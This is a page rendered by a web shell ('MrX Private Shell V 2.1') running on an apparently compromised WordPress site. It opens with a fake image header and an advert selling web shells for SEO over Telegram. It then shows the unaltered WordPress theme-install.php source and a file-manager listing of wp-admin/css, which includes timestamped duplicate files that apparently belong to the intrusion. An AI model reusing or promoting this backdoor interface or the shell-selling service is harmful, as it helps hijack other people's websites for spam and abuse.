����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* WordPress Theme Installation Administration API
*
* @package WordPress
* @subpackage Administration
*/
$themes_allowedtags = array(
'a' => array(
'href' => array(),
'title' => array(),
'target' => array(),
),
'abbr' => array( 'title' => array() ),
'acronym' => array( 'title' => array() ),
'code' => array(),
'pre' => array(),
'em' => array(),
'strong' => array(),
'div' => array(),
'p' => array(),
'ul' => array(),
'ol' => array(),
'li' => array(),
'h1' => array(),
'h2' => array(),
'h3' => array(),
'h4' => array(),
'h5' => array(),
'h6' => array(),
'img' => array(
'src' => array(),
'class' => array(),
'alt' => array(),
),
);
$theme_field_defaults = array(
'description' => true,
'sections' => false,
'tested' => true,
'requires' => true,
'rating' => true,
'downloaded' => true,
'downloadlink' => true,
'last_updated' => true,
'homepage' => true,
'tags' => true,
'num_ratings' => true,
);
/**
* Retrieves the list of WordPress theme features (aka theme tags).
*
* @since 2.8.0
*
* @deprecated 3.1.0 Use get_theme_feature_list() instead.
*
* @return array
*/
function install_themes_feature_list() {
_deprecated_function( __FUNCTION__, '3.1.0', 'get_theme_feature_list()' );
$cache = get_transient( 'wporg_theme_feature_list' );
if ( ! $cache ) {
set_transient( 'wporg_theme_feature_list', array(), 3 * HOUR_IN_SECONDS );
}
if ( $cache ) {
return $cache;
}
$feature_list = themes_api( 'feature_list', array() );
if ( is_wp_error( $feature_list ) ) {
return array();
}
set_transient( 'wporg_theme_feature_list', $feature_list, 3 * HOUR_IN_SECONDS );
return $feature_list;
}
/**
* Displays search form for searching themes.
*
* @since 2.8.0
*
* @param bool $type_selector
*/
function install_theme_search_form( $type_selector = true ) {
$type = isset( $_REQUEST['type'] ) ? wp_unslash( $_REQUEST['type'] ) : 'term';
$term = isset( $_REQUEST['s'] ) ? wp_unslash( $_REQUEST['s'] ) : '';
if ( ! $type_selector ) {
echo '<p class="install-help">' . __( 'Search for themes by keyword.' ) . '</p>';
}
?>
<form id="search-themes" method="get">
<input type="hidden" name="tab" value="search" />
<?php if ( $type_selector ) : ?>
<label class="screen-reader-text" for="typeselector">
<?php
/* translators: Hidden accessibility text. */
_e( 'Type of search' );
?>
</label>
<select name="type" id="typeselector">
<option value="term" <?php selected( 'term', $type ); ?>><?php _e( 'Keyword' ); ?></option>
<option value="author" <?php selected( 'author', $type ); ?>><?php _e( 'Author' ); ?></option>
<option value="tag" <?php selected( 'tag', $type ); ?>><?php _ex( 'Tag', 'Theme Installer' ); ?></option>
</select>
<label class="screen-reader-text" for="s">
<?php
switch ( $type ) {
case 'term':
/* translators: Hidden accessibility text. */
_e( 'Search by keyword' );
break;
case 'author':
/* translators: Hidden accessibility text. */
_e( 'Search by author' );
break;
case 'tag':
/* translators: Hidden accessibility text. */
_e( 'Search by tag' );
break;
}
?>
</label>
<?php else : ?>
<label class="screen-reader-text" for="s">
<?php
/* translators: Hidden accessibility text. */
_e( 'Search by keyword' );
?>
</label>
<?php endif; ?>
<input type="search" name="s" id="s" size="30" value="<?php echo esc_attr( $term ); ?>" autofocus="autofocus" />
<?php submit_button( __( 'Search' ), '', 'search', false ); ?>
</form>
<?php
}
/**
* Displays tags filter for themes.
*
* @since 2.8.0
*/
function install_themes_dashboard() {
install_theme_search_form( false );
?>
<h4><?php _e( 'Feature Filter' ); ?></h4>
<p class="install-help"><?php _e( 'Find a theme based on specific features.' ); ?></p>
<form method="get">
<input type="hidden" name="tab" value="search" />
<?php
$feature_list = get_theme_feature_list();
echo '<div class="feature-filter">';
foreach ( (array) $feature_list as $feature_name => $features ) {
$feature_name = esc_html( $feature_name );
echo '<div class="feature-name">' . $feature_name . '</div>';
echo '<ol class="feature-group">';
foreach ( $features as $feature => $feature_name ) {
$feature_name = esc_html( $feature_name );
$feature = esc_attr( $feature );
?>
<li>
<input type="checkbox" name="features[]" id="feature-id-<?php echo $feature; ?>" value="<?php echo $feature; ?>" />
<label for="feature-id-<?php echo $feature; ?>"><?php echo $feature_name; ?></label>
</li>
<?php } ?>
</ol>
<br class="clear" />
<?php
}
?>
</div>
<br class="clear" />
<?php submit_button( __( 'Find Themes' ), '', 'search' ); ?>
</form>
<?php
}
/**
* Displays a form to upload themes from zip files.
*
* @since 2.8.0
*/
function install_themes_upload() {
?>
<p class="install-help"><?php _e( 'If you have a theme in a .zip format, you may install or update it by uploading it here.' ); ?></p>
<form method="post" enctype="multipart/form-data" class="wp-upload-form" action="<?php echo esc_url( self_admin_url( 'update.php?action=upload-theme' ) ); ?>">
<?php wp_nonce_field( 'theme-upload' ); ?>
<label class="screen-reader-text" for="themezip">
<?php
/* translators: Hidden accessibility text. */
_e( 'Theme zip file' );
?>
</label>
<input type="file" id="themezip" name="themezip" accept=".zip" />
<?php submit_button( _x( 'Install Now', 'theme' ), '', 'install-theme-submit', false ); ?>
</form>
<?php
}
/**
* Prints a theme on the Install Themes pages.
*
* @deprecated 3.4.0
*
* @global WP_Theme_Install_List_Table $wp_list_table
*
* @param object $theme
*/
function display_theme( $theme ) {
_deprecated_function( __FUNCTION__, '3.4.0' );
global $wp_list_table;
if ( ! isset( $wp_list_table ) ) {
$wp_list_table = _get_list_table( 'WP_Theme_Install_List_Table' );
}
$wp_list_table->prepare_items();
$wp_list_table->single_row( $theme );
}
/**
* Displays theme content based on theme list.
*
* @since 2.8.0
*
* @global WP_Theme_Install_List_Table $wp_list_table
*/
function display_themes() {
global $wp_list_table;
if ( ! isset( $wp_list_table ) ) {
$wp_list_table = _get_list_table( 'WP_Theme_Install_List_Table' );
}
$wp_list_table->prepare_items();
$wp_list_table->display();
}
/**
* Displays theme information in dialog box form.
*
* @since 2.8.0
*
* @global WP_Theme_Install_List_Table $wp_list_table
*/
function install_theme_information() {
global $wp_list_table;
$theme = themes_api( 'theme_information', array( 'slug' => wp_unslash( $_REQUEST['theme'] ) ) );
if ( is_wp_error( $theme ) ) {
wp_die( $theme );
}
iframe_header( __( 'Theme Installation' ) );
if ( ! isset( $wp_list_table ) ) {
$wp_list_table = _get_list_table( 'WP_Theme_Install_List_Table' );
}
$wp_list_table->theme_installer_single( $theme );
iframe_footer();
exit;
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| colors | Folder | 0755 |
|
|
| css | Folder | 0755 |
|
|
| search_template_1775659388 | Folder | 0755 |
|
|
| about-rtl.css | File | 25.99 KB | 0644 |
|
| about-rtl.min.css | File | 19.85 KB | 0644 |
|
| about.css | File | 25.95 KB | 0644 |
|
| admin-menu-rtl.css | File | 18.39 KB | 0644 |
|
| admin-menu-rtl.min.css | File | 14.89 KB | 0644 |
|
| admin-menu.css | File | 18.34 KB | 0644 |
|
| admin-menu.min.css | File | 14.87 KB | 0644 |
|
| code-editor-20260715124827.css | File | 1.54 KB | 0644 |
|
| code-editor-rtl.min.css | File | 1.41 KB | 0644 |
|
| code-editor.css | File | 1.54 KB | 0644 |
|
| code-editor.min-20260715124955.css | File | 1.4 KB | 0644 |
|
| code-editor.min.css | File | 1.4 KB | 0644 |
|
| color-picker-rtl.css | File | 3.78 KB | 0644 |
|
| color-picker-rtl.min.css | File | 3.06 KB | 0644 |
|
| color-picker.css | File | 3.74 KB | 0644 |
|
| color-picker.min.css | File | 3.05 KB | 0644 |
|
| common-20260715115703.css | File | 75.91 KB | 0644 |
|
| common-rtl.css | File | 75.99 KB | 0644 |
|
| common-rtl.min-20260715135052.css | File | 57.58 KB | 0644 |
|
| common-rtl.min.css | File | 57.58 KB | 0644 |
|
| common.css | File | 75.91 KB | 0644 |
|
| common.min.css | File | 57.53 KB | 0644 |
|
| customize-controls-rtl.css | File | 69.91 KB | 0644 |
|
| customize-controls-rtl.min.css | File | 58.7 KB | 0644 |
|
| customize-controls.css | File | 69.83 KB | 0644 |
|
| customize-controls.min.css | File | 58.66 KB | 0644 |
|
| customize-nav-menus-rtl.css | File | 21.62 KB | 0644 |
|
| customize-nav-menus-rtl.min.css | File | 17.72 KB | 0644 |
|
| customize-nav-menus.css | File | 21.58 KB | 0644 |
|
| customize-nav-menus.min.css | File | 17.71 KB | 0644 |
|
| customize-widgets-rtl.css | File | 12.3 KB | 0644 |
|
| customize-widgets-rtl.min.css | File | 9.39 KB | 0644 |
|
| customize-widgets.css | File | 12.27 KB | 0644 |
|
| customize-widgets.min.css | File | 9.38 KB | 0644 |
|
| dashboard-rtl.css | File | 29.13 KB | 0644 |
|
| dashboard-rtl.min-20260715130556.css | File | 22.13 KB | 0644 |
|
| dashboard-rtl.min.css | File | 22.13 KB | 0644 |
|
| dashboard.css | File | 29.1 KB | 0644 |
|
| dashboard.min-20260715135131.css | File | 22.14 KB | 0644 |
|
| dashboard.min.css | File | 22.14 KB | 0644 |
|
| deprecated-media-rtl.css | File | 6.5 KB | 0644 |
|
| deprecated-media-rtl.min.css | File | 5.37 KB | 0644 |
|
| deprecated-media.css | File | 6.46 KB | 0644 |
|
| deprecated-media.min.css | File | 5.36 KB | 0644 |
|
| edit-rtl.css | File | 37.07 KB | 0644 |
|
| edit-rtl.min.css | File | 29.18 KB | 0644 |
|
| edit.css | File | 37.03 KB | 0644 |
|
| edit.min.css | File | 29.17 KB | 0644 |
|
| farbtastic-rtl-20260715114535.css | File | 647 B | 0644 |
|
| farbtastic-rtl.css | File | 647 B | 0644 |
|
| farbtastic-rtl.min.css | File | 538 B | 0644 |
|
| farbtastic.css | File | 611 B | 0644 |
|
| farbtastic.min-20260715114548.css | File | 537 B | 0644 |
|
| farbtastic.min.css | File | 537 B | 0644 |
|
| forms-rtl-20260715115622.css | File | 36.07 KB | 0644 |
|
| forms-rtl.css | File | 36.07 KB | 0644 |
|
| forms-rtl.min.css | File | 27.78 KB | 0644 |
|
| forms.css | File | 36.04 KB | 0644 |
|
| forms.min-20260715135938.css | File | 27.78 KB | 0644 |
|
| forms.min.css | File | 27.78 KB | 0644 |
|
| install-rtl.css | File | 6.05 KB | 0644 |
|
| install-rtl.min-20260715114559.css | File | 4.95 KB | 0644 |
|
| install-rtl.min.css | File | 4.95 KB | 0644 |
|
| install.css | File | 6.01 KB | 0644 |
|
| install.min.css | File | 4.95 KB | 0644 |
|
| l10n-rtl.css | File | 4.47 KB | 0644 |
|
| l10n.css | File | 4.43 KB | 0644 |
|
| l10n.min.css | File | 3.13 KB | 0644 |
|
| list-tables-rtl.css | File | 43.14 KB | 0644 |
|
| list-tables-rtl.min.css | File | 34.87 KB | 0644 |
|
| list-tables.css | File | 43.08 KB | 0644 |
|
| list-tables.min.css | File | 34.84 KB | 0644 |
|
| login-rtl-20260715114630.css | File | 7.85 KB | 0644 |
|
| login-rtl.css | File | 7.85 KB | 0644 |
|
| login-rtl.min.css | File | 6.28 KB | 0644 |
|
| login.css | File | 7.82 KB | 0644 |
|
| login.min.css | File | 6.27 KB | 0644 |
|
| media-20260715124533.css | File | 26.3 KB | 0644 |
|
| media-rtl.css | File | 26.35 KB | 0644 |
|
| media-rtl.min.css | File | 21.29 KB | 0644 |
|
| media.css | File | 26.3 KB | 0644 |
|
| media.min.css | File | 21.28 KB | 0644 |
|
| nav-menus-rtl.css | File | 17.56 KB | 0644 |
|
| nav-menus-rtl.min.css | File | 13.85 KB | 0644 |
|
| nav-menus.css | File | 17.5 KB | 0644 |
|
| nav-menus.min.css | File | 13.83 KB | 0644 |
|
| revisions-rtl-20260715120643.css | File | 9.95 KB | 0644 |
|
| revisions-rtl.css | File | 9.95 KB | 0644 |
|
| revisions-rtl.min-20260715120807.css | File | 8.13 KB | 0644 |
|
| revisions-rtl.min.css | File | 8.13 KB | 0644 |
|
| revisions.css | File | 9.91 KB | 0644 |
|
| revisions.min.css | File | 8.11 KB | 0644 |
|
| site-health-rtl.css | File | 6.13 KB | 0644 |
|
| site-health-rtl.min.css | File | 5.06 KB | 0644 |
|
| site-health.css | File | 6.09 KB | 0644 |
|
| site-health.min.css | File | 5.05 KB | 0644 |
|
| site-icon-rtl.css | File | 4.54 KB | 0644 |
|
| site-icon-rtl.min.css | File | 3.85 KB | 0644 |
|
| site-icon.css | File | 4.49 KB | 0644 |
|
| site-icon.min.css | File | 3.84 KB | 0644 |
|
| theme-install.php | File | 6.83 KB | 0644 |
|
| themes-20260715134848.css | File | 40.78 KB | 0644 |
|
| themes-rtl-20260715124739.css | File | 40.84 KB | 0644 |
|
| themes-rtl.css | File | 40.84 KB | 0644 |
|
| themes-rtl.min.css | File | 31.94 KB | 0644 |
|
| themes.css | File | 40.78 KB | 0644 |
|
| themes.min.css | File | 31.92 KB | 0644 |
|
| widgets-rtl.css | File | 17.25 KB | 0644 |
|
| widgets-rtl.min.css | File | 14.09 KB | 0644 |
|
| widgets.css | File | 17.22 KB | 0644 |
|
| widgets.min.css | File | 14.08 KB | 0644 |
|
| wp-admin-rtl.css | File | 490 B | 0644 |
|
| wp-admin-rtl.min.css | File | 550 B | 0644 |
|
| wp-admin.css | File | 395 B | 0644 |
|
| wp-admin.min.css | File | 490 B | 0644 |
|